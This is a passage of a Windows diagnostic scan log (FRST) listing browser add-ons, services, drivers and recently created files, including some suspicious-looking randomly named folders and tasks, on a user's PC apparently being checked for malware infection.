      BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2016-11-15] (Microsoft Corporation)
      Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL [2016-05-17] (Microsoft Corporation)

      FireFox:
      ========
      FF ProfilePath: C:\Users\Alberto\AppData\Roaming\Mozilla\Firefox\Profiles\7ps06yci.default-1434332033695 [2017-02-16]
      FF Homepage: Mozilla\Firefox\Profiles\7ps06yci.default-1434332033695 -> hxxps://www.malwarebytes.org/restorebrowser/
      FF Extension: (Video DownloadHelper) - C:\Users\Alberto\AppData\Roaming\Mozilla\Firefox\Profiles\7ps06yci.default-1434332033695\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2015-10-30]
      FF Extension: (Skype) - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2016-01-06]
      FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_24_0_0_194.dll [2017-01-11] ()
      FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~1\Office15\NPSPWRAP.DLL [2014-01-23] (Microsoft Corporation)
      FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-12-09] (Adobe Systems)
      FF Plugin: adobe.com/AdobeExManDetect -> C:\Program Files (x86)\Adobe\Adobe Extension Manager CS6\Win64Plugin\npAdobeExManDetectX64.dll [2013-12-02] (Adobe Systems)
      FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_24_0_0_194.dll [2017-01-11] ()
      FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\WINDOWS\SysWOW64\Adobe\Director\np32dsw_1214154.dll [No File]
      FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-09-16] (Intel Corporation)
      FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-09-16] (Intel Corporation)
      FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2016-07-19] (Microsoft Corporation)
      FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL [2014-01-22] (Microsoft Corporation)
      FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2017-02-14] (Google Inc.)
      FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.32.7\npGoogleUpdate3.dll [2017-02-14] (Google Inc.)
      FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-12-23] (Adobe Systems Inc.)
      FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-12-09] (Adobe Systems)
      FF Plugin-x32: adobe.com/AdobeExManDetect -> C:\Program Files (x86)\Adobe\Adobe Extension Manager CS6\npAdobeExManDetectX86.dll [2013-12-02] (Adobe Systems)
      FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMeetingJoinPluginOC.dll [2016-07-19] (Microsoft Corporation)
      FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2015-12-18] (Adobe Systems Inc.)

      Chrome:
      =======
      CHR DefaultProfile: ChromeDefaultData
      CHR StartupUrls: ChromeDefaultData -> "hxxp://www.google.com/"
      CHR Profile: C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-02-16] <==== ATTENTION
      CHR Extension: (Google Docs) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aohghmighlieiainnegkcijnfilokake [2017-02-09]
      CHR Extension: (Google Drive) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-02-09]
      CHR Extension: (YouTube) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-02-09]
      CHR Extension: (Adobe Acrobat) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2017-02-09]
      CHR Extension: (Documentos de Google sin conexión) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-02-09]
      CHR Extension: (Skype) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2017-02-09]
      CHR Extension: (Sistema de pagos de Chrome Web Store) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-02-09]
      CHR Extension: (Warcraft [FVD]) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\oaajcindhmafibnlcpbjkclfbmnoelfb [2017-02-14]
      CHR Extension: (Gmail) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-02-09]
      CHR Extension: (Chrome Media Router) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-02-09]
      CHR Profile: C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default [2017-02-15]
      CHR Extension: (Presentaciones de Google) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-02-09]
      CHR Extension: (Google Docs) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-02-09]
      CHR Extension: (Google Drive) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2017-02-09]
      CHR Extension: (YouTube) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-02-09]
      CHR Extension: (Adobe Acrobat) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2017-02-09]
      CHR Extension: (Hojas de cálculo de Google) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-02-09]
      CHR Extension: (Documentos de Google sin conexión) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-02-09]
      CHR Extension: (Sistema de pagos de Chrome Web Store) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-02-09]
      CHR Extension: (Gmail) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-02-09]
      CHR Extension: (Chrome Media Router) - C:\Users\Alberto\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-02-09]
      CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
      CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - hxxps://clients2.google.com/service/update2/crx

      ==================== Services (Whitelisted) ====================

      (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

      S3 Adobe LM Service; C:\Program Files (x86)\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe [72704 2016-01-29] (Adobe Systems) [File not signed]
      R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [753240 2016-12-09] (Adobe Systems Incorporated)
      R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2227312 2017-01-19] (Adobe Systems, Incorporated)
      R2 BTDevManager; C:\Program Files (x86)\REALTEK\Realtek Bluetooth\BTDevMgr.exe [79872 2014-01-06] () [File not signed]
      R2 ETDService; C:\Program Files\Elantech\ETDService.exe [99632 2013-10-09] (ELAN Microelectronics Corp.)
      R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [31776 2016-12-07] (HP Inc.)
      R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-08-07] (Intel Corporation)
      R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [File not signed]
      S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
      R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-09-16] (Intel Corporation)
      R2 Lenovo System Agent Service; C:\Program Files\Lenovo\iMController\SystemAgentService.exe [584664 2015-12-14] (LENOVO INCORPORATED.)
      R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4355024 2017-01-20] (Malwarebytes)
      R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1720792 2014-08-09] (NVIDIA Corporation)
      R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [18973144 2014-08-09] (NVIDIA Corporation)
      S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
      S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366552 2015-07-07] (Microsoft Corporation)
      S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2015-07-07] (Microsoft Corporation)

      ===================== Drivers (Whitelisted) ======================

      (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

      S3 A38CCID; C:\WINDOWS\system32\DRIVERS\a38ccid.sys [82480 2015-08-19] (Advanced Card Systems Ltd.)
      R1 ESProtectionDriver; C:\WINDOWS\system32\drivers\mbae64.sys [77416 2017-01-20] ()
      R2 MBAMChameleon; C:\WINDOWS\system32\drivers\MBAMChameleon.sys [176584 2017-02-15] (Malwarebytes)
      R3 MBAMFarflt; C:\WINDOWS\system32\drivers\farflt.sys [110536 2017-02-16] (Malwarebytes)
      R3 MBAMProtection; C:\WINDOWS\system32\drivers\mbam.sys [43968 2017-02-16] (Malwarebytes)
      R0 MBAMSwissArmy; C:\WINDOWS\System32\drivers\MBAMSwissArmy.sys [251848 2017-02-16] (Malwarebytes)
      R3 MBAMWebProtection; C:\WINDOWS\system32\drivers\mwac.sys [91584 2017-02-16] (Malwarebytes)
      R3 MEIx64; C:\WINDOWS\system32\DRIVERS\TeeDriverx64.sys [99288 2013-09-16] (Intel Corporation)
      S3 NETwNe64; C:\WINDOWS\system32\DRIVERS\NETwew02.sys [4649440 2013-06-18] (Intel Corporation)
      R3 NIWinCDEmu; C:\WINDOWS\System32\drivers\NIWinCDEmu.sys [111696 2015-05-19] ()
      R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [20440 2014-08-09] (NVIDIA Corporation)
      R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [40392 2014-03-31] (NVIDIA Corporation)
      S3 RDID1079; C:\WINDOWS\system32\Drivers\rdwm1079.sys [199680 2012-10-23] (Roland Corporation)
      R3 RtkBtFilter; C:\WINDOWS\system32\DRIVERS\RtkBtfilter.sys [558296 2014-01-05] (Realtek Semiconductor Corporation)
      R3 rtsuvc; C:\WINDOWS\system32\DRIVERS\rtsuvc.sys [9101016 2013-12-23] (Realtek Semiconductor Corp.)
      R3 RTWlanE; C:\WINDOWS\system32\DRIVERS\rtwlane.sys [2982104 2013-12-26] (Realtek Semiconductor Corporation )
      S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44560 2015-07-07] (Microsoft Corporation)
      S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [270168 2015-07-07] (Microsoft Corporation)
      S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [114520 2015-07-07] (Microsoft Corporation)
      S3 wsvd; C:\WINDOWS\system32\DRIVERS\wsvd.sys [102376 2012-06-13] ("CyberLink)
      U3 ucdrv; no ImagePath

      ==================== NetSvcs (Whitelisted) ===================

      (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


      ==================== One Month Created files and folders ========

      (If an entry is included in the fixlist, the file/folder will be moved.)

      2017-02-16 23:02 - 2017-02-16 23:02 - 00027597 _____ C:\Users\Alberto\Desktop\FRST.txt
      2017-02-16 23:01 - 2017-02-16 23:02 - 00000000 ____D C:\FRST
      2017-02-16 23:01 - 2017-02-16 22:58 - 02422272 _____ (Farbar) C:\Users\Alberto\Desktop\FRST64.exe
      2017-02-16 23:00 - 2017-02-16 23:00 - 00001391 _____ C:\Users\Alberto\Desktop\malwareanalisis2.txt
      2017-02-16 22:54 - 2017-02-16 22:54 - 00002487 _____ C:\Users\Alberto\Desktop\malwareanalisis.txt
      2017-02-16 22:13 - 2017-02-16 22:13 - 00000000 ____D C:\Users\Alberto\Desktop\backups
      2017-02-16 21:54 - 2017-02-16 21:54 - 00388608 _____ (Trend Micro Inc.) C:\Users\Alberto\Desktop\HijackThis.exe
      2017-02-15 23:45 - 2017-02-16 21:40 - 00251848 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
      2017-02-15 23:45 - 2017-02-16 21:40 - 00110536 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys
      2017-02-15 23:45 - 2017-02-16 21:40 - 00091584 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys
      2017-02-15 23:45 - 2017-02-16 21:40 - 00043968 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
      2017-02-15 23:45 - 2017-02-15 23:45 - 00176584 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMChameleon.sys
      2017-02-15 23:44 - 2017-02-15 23:44 - 00001854 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
      2017-02-15 23:44 - 2017-02-15 23:44 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
      2017-02-15 23:44 - 2017-02-15 23:44 - 00000000 ____D C:\Program Files\Malwarebytes
      2017-02-15 23:44 - 2017-01-20 07:47 - 00077416 _____ C:\WINDOWS\system32\Drivers\mbae64.sys
      2017-02-15 22:26 - 2017-02-15 22:26 - 00352767 _____ C:\Users\Alberto\Downloads\Elecciones gnrales 2016.pptx
      2017-02-15 09:20 - 2017-02-15 09:20 - 00002792 _____ C:\WINDOWS\System32\Tasks\CCleanerSkipUAC
      2017-02-15 09:20 - 2017-02-15 09:20 - 00000805 _____ C:\Users\Public\Desktop\CCleaner.lnk
      2017-02-15 09:20 - 2017-02-15 09:20 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
      2017-02-15 09:19 - 2017-02-15 09:20 - 00000000 ____D C:\Program Files\CCleaner
      2017-02-15 03:10 - 2017-02-15 03:10 - 08813488 _____ (Piriform Ltd) C:\Users\Alberto\Downloads\ccsetup526.exe
      2017-02-15 03:04 - 2017-02-15 03:05 - 09261616 _____ (Piriform Ltd) C:\Users\Alberto\Downloads\ccsetup527.exe
      2017-02-14 23:10 - 2017-02-16 22:56 - 00001535 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
      2017-02-14 23:10 - 2017-02-16 22:56 - 00001523 _____ C:\Users\Public\Desktop\Google Chrome.lnk
      2017-02-14 23:09 - 2017-02-14 23:09 - 00003532 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
      2017-02-14 23:09 - 2017-02-14 23:09 - 00003404 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
      2017-02-14 23:09 - 2017-02-14 23:09 - 00000000 ____D C:\Users\Alberto\AppData\Local\Deployment
      2017-02-14 23:09 - 2017-02-14 23:09 - 00000000 ____D C:\Users\Alberto\AppData\Local\Apps\2.0
      2017-02-14 20:42 - 2017-02-14 20:42 - 00031202 _____ C:\Users\Alberto\Desktop\CONFIRMACIÓN TRANSFERENCIA.pdf
      2017-02-14 19:40 - 2017-02-14 19:40 - 04015056 _____ C:\Users\Alberto\Downloads\adwcleaner_6.043 (1).exe
      2017-02-14 19:19 - 2017-02-15 23:44 - 00000000 ____D C:\ProgramData\Malwarebytes
      2017-02-14 19:18 - 2017-02-14 19:18 - 00000000 ____D C:\Users\Alberto\AppData\Roaming\Obsidium
      2017-02-13 18:16 - 2017-02-13 18:16 - 00030487 _____ C:\Users\Alberto\Desktop\TRANSFERENCIA.pdf
      2017-02-13 13:13 - 2017-02-13 13:13 - 07486639 _____ C:\Users\Alberto\Downloads\psd-blank-white-t-shirt.zip
      2017-02-11 13:24 - 2017-02-11 13:24 - 12210037 _____ C:\Users\Alberto\Downloads\Trabajo final MDP (1).pdf
      2017-02-11 13:22 - 2017-02-11 13:22 - 01157833 _____ C:\Users\Alberto\Downloads\TEMA 3. LNP.pdf
      2017-02-11 13:22 - 2017-02-11 13:22 - 01157833 _____ C:\Users\Alberto\Downloads\TEMA 3. LNP (1).pdf
      2017-02-11 12:59 - 2017-02-11 12:59 - 01633090 _____ C:\Users\Alberto\Downloads\PRESENTACIÓN UT 5 DIFUSIÓN DE MATERIALES PUBLICITARIOS.pptx
      2017-02-09 22:04 - 2017-02-09 22:05 - 55566792 _____ (Malwarebytes ) C:\Users\Alberto\Downloads\mb3-setup-consumer-3.0.6.1469.exe
      2017-02-09 20:49 - 2017-02-10 00:25 - 00000000 ____D C:\Program Files\GridinSoft Anti-Malware
      2017-02-09 20:49 - 2017-02-09 22:22 - 00003280 _____ C:\WINDOWS\System32\Tasks\GridinSoft Anti-Malware
      2017-02-09 20:49 - 2017-02-09 20:49 - 00000000 ____D C:\ProgramData\GridinSoft
      2017-02-09 19:16 - 2017-02-09 19:16 - 00000000 _____ C:\autoexec.bat
      2017-02-09 19:15 - 2017-02-16 21:42 - 00000000 ___RD C:\Users\Alberto\Creative Cloud Files
      2017-02-09 19:11 - 2017-02-09 19:11 - 00000000 ____D C:\ProgramData\Lavasoft
      2017-02-09 18:41 - 2017-02-09 22:04 - 00004297 _____ C:\InfoSat.txt
      2017-02-09 18:41 - 2017-02-09 17:01 - 00006661 _____ C:\WINDOWS\system32\Drivers\etc\Hosts(2017-02-09 184119)
      2017-02-09 17:33 - 2017-02-09 17:33 - 00003094 _____ C:\WINDOWS\System32\Tasks\{BEFD2162-C6CF-488F-8778-A79BA873E300}
      2017-02-09 17:05 - 2017-02-09 17:05 - 00000000 ____D C:\ProgramData\Avira
      2017-02-09 17:05 - 2017-02-09 17:05 - 00000000 ____D C:\ProgramData\Avg
      2017-02-09 17:05 - 2017-02-09 17:05 - 00000000 ____D C:\ProgramData\AVAST Software
      2017-02-09 17:03 - 2017-02-09 17:57 - 00000000 ____D C:\Users\Alberto\AppData\Roaming\Thugagh
      2017-02-09 17:03 - 2017-02-09 17:10 - 00000000 ____D C:\Users\Alberto\AppData\Local\Zicsythifetain
      2017-02-09 17:03 - 2017-02-09 17:03 - 00006096 _____ C:\WINDOWS\System32\Tasks\Erwushprazase Configuration
      2017-02-09 17:03 - 2017-02-09 17:03 - 00005058 _____ C:\WINDOWS\System32\Tasks\Chevuge
      2017-02-09 17:01 - 2017-02-09 17:01 - 00720033 _____ C:\WINDOWS\unins000.exe
      2017-02-09 17:01 - 2017-02-09 17:01 - 00035871 _____ C:\WINDOWS\unins000.dat
      2017-02-09 17:00 - 2017-02-09 17:00 - 00000000 ____D C:\Users\Alberto\AppData\Local\Zujerle
      2017-02-09 13:30 - 2017-02-09 13:30 - 00000000 ____D C:\Users\Alberto\AppData\Local\UCBrowser
      2017-02-09 12:58 - 2017-02-09 12:58 - 00000282 __RSH C:\Users\Alberto\ntuser.pol
      2017-02-09 12:51 - 2017-02-09 12:51 - 04015056 _____ C:\Users\Alberto\Downloads\adwcleaner_6.043.exe
      2017-02-09 12:51 - 2017-02-09 12:51 - 04015056 _____ C:\Users\Alberto\Desktop\adwcleaner_6.043.exe
      2017-02-09 12:48 - 2017-02-09 17:23 - 00000000 ____D C:\WINDOWS\system32\SSL
      2017-02-09 12:40 - 2017-02-09 12:40 - 06774784 _____ C:\Users\Alberto\Downloads\Sin confirmar 701977.crdownload
      2017-02-09 12:06 - 2017-02-09 12:06 - 00001105 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Media Encoder CC 2017.lnk
      2017-02-09 12:01 - 2017-02-09 12:01 - 00000000 ____D C:\Users\Alberto\Documents\Toontrack
      2017-02-09 12:01 - 2017-02-09 12:01 - 00000000 ____D C:\ProgramData\Toontrack
      2017-02-09 12:00 - 2017-02-09 12:00 - 00001093 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro CC 2017.lnk
      2017-02-09 11:50 - 2017-02-16 21:42 - 00000000 ____D C:\ProgramData\boost_interprocess
      2017-02-09 11:40 - 2017-02-09 11:40 - 00001256 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk
      2017-02-08 23:38 - 2017-02-08 23:39 - 63958782 _____ C:\Users\Alberto\Downloads\Glow Run 5K Puebla 2015.mov
      2017-02-08 22:42 - 2017-02-08 22:42 - 03444311 _____ C:\Users\Alberto\Downloads\green screen paint splat.mov
      2017-02-08 22:36 - 2017-02-08 22:36 - 03876609 _____ C:\Users\Alberto\Downloads\Free Slow Motion Footage Red Paint Splatter.mov
      2017-02-07 15:53 - 2017-02-07 15:53 - 03086008 _____ C:\WINDOWS\03c0b2a52c74a8ed6bdab134597543b4.exe
      2017-02-05 23:23 - 2017-02-06 10:28 - 16484059 _____ C:\Users\Alberto\Desktop\colplay-foto grande agrupado.psd
      2017-02-05 22:36 - 2017-02-05 23:22 - 16753315 _____ C:\Users\Alberto\Desktop\colplay-foto grande.psd
      2017-02-05 22:17 - 2017-02-05 22:17 - 00090717 _____ C:\Users\Alberto\Downloads\colplay-foto-2 (1).svg
      2017-02-05 22:16 - 2017-02-05 22:16 - 00059783 _____ C:\Users\Alberto\Downloads\colplay-foto-2 (1).pdf
      2017-02-05 22:14 - 2017-02-05 22:15 - 12550329 _____ C:\Users\Alberto\Downloads\colplay-foto-2.eps
      2017-02-05 22:13 - 2017-02-05 22:13 - 06993061 _____ C:\Users\Alberto\Downloads\colplay-foto-2.pdf
      2017-02-05 22:12 - 2017-02-05 22:12 - 07569607 _____ C:\Users\Alberto\Downloads\colplay-foto-2.svg
      2017-02-05 22:07 - 2017-02-05 22:07 - 51137209 _____ C:\Users\Alberto\Desktop\colplay foto 2.psd
      2017-02-05 21:49 - 2017-02-05 23:46 - 38017806 _____ C:\Users\Alberto\Desktop\colplay foto.psd
      2017-02-03 01:44 - 2017-02-03 01:53 - 00000000 ____D C:\Users\Alberto\Images
      2017-02-03 01:18 - 2017-02-03 01:18 - 00000000 ____D C:\Program Files\Audio
      2017-02-02 22:28 - 2017-02-02 22:28 - 09297545 _____ C:\Users\Alberto\Downloads\TEMAZO (1).wma
      2017-02-01 12:41 - 2017-02-03 01:53 - 00000000 ____D C:\Users\Alberto\Audio
      2017-02-01 00:32 - 2017-02-01 00:32 - 00007258 _____ C:\Users\Alberto\Downloads\ACTIVIDAD UT5.odt
      2017-01-30 10:04 - 2017-01-30 10:05 - 00000000 ____D C:\Users\Alberto\Desktop\frute
      2017-01-26 13:54 - 2017-02-09 14:23 - 00000000 ____D C:\Users\Alberto\Desktop\PROYECTO DE PRUEBA
      2017-01-26 08:33 - 2017-01-26 08:33 - 00251549 _____ C:\Users\Alberto\Downloads\Presentación1.pptx
      2017-01-25 11:35 - 2017-01-25 11:35 - 00471347 _____ C:\Users\Alberto\Downloads\oranges-and-cherrys_Vector-Pattern.zip
      2017-01-24 20:25 - 2017-01-24 20:25 - 00920051 _____ C:\Users\Alberto\Downloads\-HibiscusPatterns.pat.zip
      2017-01-24 20:24 - 2017-01-24 20:24 - 16405314 _____ C:\Users\Alberto\Downloads\-12-webtreats-grunge-stripes.zip
      2017-01-24 20:23 - 2017-01-24 20:23 - 02370088 _____ C:\Users\Alberto\Downloads\fruit_and_vegetable_pattern_310757 (1).zip
      2017-01-24 20:21 - 2017-01-24 20:22 - 02370088 _____ C:\Users\Alberto\Downloads\fruit_and_vegetable_pattern_310757.zip
      2017-01-24 19:36 - 2017-01-24 19:36 - 02949093 _____ C:\Users\Alberto\Downloads\Food_Icons_PSD_Set.zip
      2017-01-24 19:30 - 2017-01-24 19:30 - 01063319 _____ C:\Users\Alberto\Downloads\kitchen_flat_icons_01_ai.zip
      2017-01-24 18:37 - 2017-01-24 18:37 - 01808832 _____ C:\Users\Alberto\Downloads\UNIDAD DE TRABAJO Nº 6.pdf
      2017-01-23 21:52 - 2017-01-23 21:52 - 01777080 _____ C:\Users\Alberto\Downloads\Happy_Little_Halloween_Patterns_by_HadriART.rar
      2017-01-23 21:35 - 2017-01-23 21:35 - 00026973 _____ C:\Users\Alberto\Downloads\Breakfreebie.pat.zip
      2017-01-23 11:58 - 2017-01-23 11:58 - 00149614 _____ C:\Users\Alberto\Downloads\horros.zip
      2017-01-23 11:57 - 2017-01-23 11:57 - 00018572 _____ C:\Users\Alberto\Downloads\delta-echo.zip
      2017-01-23 10:35 - 2017-01-23 10:35 - 00478154 _____ C:\Users\Alberto\Downloads\pdf2doc (1).zip
      2017-01-23 10:34 - 2017-01-23 10:34 - 00431235 _____ C:\Users\Alberto\Desktop\hoja_reclamaciones_enero07.pdf
      2017-01-23 10:28 - 2017-01-23 10:28 - 00033435 _____ C:\Users\Alberto\Downloads\pdf2doc.zip
      2017-01-21 11:23 - 2017-01-21 11:23 - 00044350 _____ C:\Users\Alberto\Downloads\Recibo de pasaje electrónico%2c 08 abril para MS FLOR DE LIZ CORTEZ FOSADO.pdf
      2017-01-21 11:22 - 2017-01-21 11:22 - 00038456 _____ C:\Users\Alberto\Downloads\Reserva de viaje 08 abril para MS FLOR DE LIZ CORTEZ FOSADO.pdf
      2017-01-21 11:14 - 2017-01-21 11:14 - 00011812 _____ C:\Users\Alberto\Downloads\Informacion de la reserva de CORTEZFOSADO - FLOR DE LIZ - 2KIOXH.pdf

      ==================== One Month Modified files and folders ========

      (If an entry is included in the fixlist, the file/folder will be moved.)

      2017-02-16 23:01 - 2014-09-16 23:08 - 00003598 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1830392043-3884525579-1098650476-1002
      2017-02-16 22:09 - 2015-01-30 16:35 - 00000838 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
      2017-02-16 21:42 - 2014-12-12 03:46 - 00000000 ____D C:\Users\Alberto\AppData\Local\Adobe
      2017-02-16 21:40 - 2014-09-16 23:05 - 00000000 __RDO C:\Users\Alberto\OneDrive
      2017-02-16 21:39 - 2013-08-22 14:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
      2017-02-16 18:33 - 2014-09-16 23:12 - 00003982 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{0AA9FC2E-101A-43C8-BF68-4825711875FD}
      2017-02-16 03:16 - 2015-01-18 02:56 - 00000000 ____D C:\Users\Alberto\AppData\Roaming\Skype
      2017-02-15 23:57 - 2013-08-22 13:25 - 00524288 ___SH C:\WINDOWS\system32\config\BBI
      2017-02-15 23:56 - 2015-12-05 02:55 - 00000000 ____D C:\AdwCleaner
      2017-02-15 23:47 - 2014-05-10 00:08 - 00812192 _____ C:\WINDOWS\system32\perfh00A.dat
      2017-02-15 23:47 - 2014-05-10 00:08 - 00167450 _____ C:\WINDOWS\system32\perfc00A.dat
      2017-02-15 23:47 - 2014-03-18 09:53 - 01833224 _____ C:\WINDOWS\system32\PerfStringBackup.INI
      2017-02-15 23:47 - 2013-08-22 13:36 - 00000000 ____D C:\WINDOWS\Inf
      2017-02-15 23:43 - 2014-09-18 17:48 - 00000000 ____D C:\Users\Alberto\Programas
      2017-02-15 22:29 - 2014-09-16 23:02 - 00000000 ____D C:\Users\Alberto\AppData\Local\Packages
